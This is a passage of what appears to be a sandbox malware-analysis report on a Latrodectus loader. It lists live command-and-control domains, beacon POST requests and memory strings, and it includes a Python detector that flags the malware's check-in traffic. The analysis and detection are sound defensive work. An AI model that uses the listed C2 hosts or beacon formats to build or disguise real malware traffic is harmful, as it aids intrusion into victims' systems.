Source: global traffic DNS traffic detected: DNS query: altynbe.com
Source: global traffic DNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
Source: global traffic DNS traffic detected: DNS query: anikvan.com
Source: global traffic DNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: global traffic DNS traffic detected: DNS query: workspacin.cloud
Source: unknown HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 538 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:04:29 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:04:54 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:05:03 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 May 2024 22:05:21 GMT | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | Connection: close | Strict-Transport-Security: max-age=15724800; includeSubDomains
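The HTTP traffic above shows two distinct request profiles: rundll32.exe posting to /api/azure and /content.php on boriz400.com, altynbe.com, anikvan.com and the two cloud-ara.tyk.io hosts with a Chrome/90.0.4430.93 User-Agent, and the injected explorer.exe posting form-encoded bodies to /live/ on workspacin.cloud with the fixed "Tob 1.1" User-Agent that the string decryptor recovered. The block below is an added example, not part of the Joe Sandbox report: it parses raw HTTP/1.1 request heads and tags the ones that match either profile, so the same check can run over proxy captures. The request samples are constructed for the example, not captured traffic, and example.com stands in for an unrelated host.

```python
"""Proxy-side matching for the two HTTP request profiles in this report.

Added example, not part of the Joe Sandbox report. Tags a request as
(a) the Latrodectus check-in seen from explorer.exe: POST /live/ to a host from
the extracted config, User-Agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; Tob 1.1)", form-encoded body; or (b) the rundll32.exe POSTs to /api/azure
and /content.php with a Chrome/90.0.4430.93 User-Agent. Samples are constructed.
"""
from dataclasses import dataclass, field

LATRODECTUS_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)"
LATRODECTUS_C2 = {"workspacin.cloud", "illoskanawer.com"}   # from the extracted config
RUNDLL32_HOSTS = {"boriz400.com", "altynbe.com", "anikvan.com",
                  "ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io",
                  "uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io"}
RUNDLL32_PATHS = {"/api/azure", "/content.php"}
RUNDLL32_UA_MARK = "Chrome/90.0.4430.93"


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_request_head(raw):
    """Parse the request line and headers of an HTTP/1.1 request head.

    Accepts CRLF or LF line endings, stops at the first blank line (the body
    is not needed here) and lower-cases header names. Raises ValueError on a
    malformed request line instead of guessing.
    """
    lines = raw.replace("\r\n", "\n").lstrip("\n").split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line: %r" % lines[0])
    req = Request(parts[0], parts[1])
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            req.headers[name.strip().lower()] = value.strip()
    return req


def classify(req):
    """Return the list of reasons a request matches this report (empty = no match)."""
    tags = []
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent", "")
    ctype = req.headers.get("content-type", "")
    if ua == LATRODECTUS_UA:
        tags.append("latrodectus_ua")          # fixed string, cheap to block outright
    if host in LATRODECTUS_C2:
        tags.append("latrodectus_c2_host")
    if (req.method == "POST" and req.path == "/live/"
            and ctype.startswith("application/x-www-form-urlencoded")):
        tags.append("latrodectus_checkin_shape")
    if host in RUNDLL32_HOSTS:
        tags.append("report_rundll32_host")
    if req.method == "POST" and req.path in RUNDLL32_PATHS and RUNDLL32_UA_MARK in ua:
        tags.append("report_rundll32_post_shape")
    return tags


def scan(raw_requests):
    """Classify each raw request head; return (host, path, tags) for those that match."""
    hits = []
    for raw in raw_requests:
        req = parse_request_head(raw)
        tags = classify(req)
        if tags:
            hits.append((req.headers.get("host", ""), req.path, tags))
    return hits


CHROME90 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36")

# Constructed request heads shaped like the ones listed in the report.
SAMPLE_REQUESTS = [
    "POST /live/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: " + LATRODECTUS_UA + "\r\nHost: workspacin.cloud\r\nContent-Length: 248\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "POST /api/azure HTTP/1.1\r\nUser-Agent: " + CHROME90 + "\r\nHost: altynbe.com\r\n"
    "Content-Length: 154\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    # Same path and stale Chrome build but an unlisted host: partial match only.
    "POST /content.php HTTP/1.1\r\nUser-Agent: " + CHROME90 + "\r\nHost: example.com\r\n"
    "Content-Length: 154\r\n\r\n",
    # Ordinary browsing with a current browser build: no tags.
    "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

Host and path tags are the perishable part; the "Tob 1.1" User-Agent and the POST /live/ form-encoded shape come from the decrypted strings, so they survive a change of C2 domain and are the tags worth keeping after the hosts in this report go stale.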
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/
Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/5~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/=~
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/B_F
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/U~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/X
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/api/azure
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/api/azurep
Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/api/azureure
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/content.php
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/content.php2f
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/d
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/ic
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://altynbe.com/tyk.io
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/I~
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/api/azure
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/api/azure==
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/api/azuret.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/content.php
Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/content.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/content.phpGf
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/d
Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://anikvan.com/ic
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
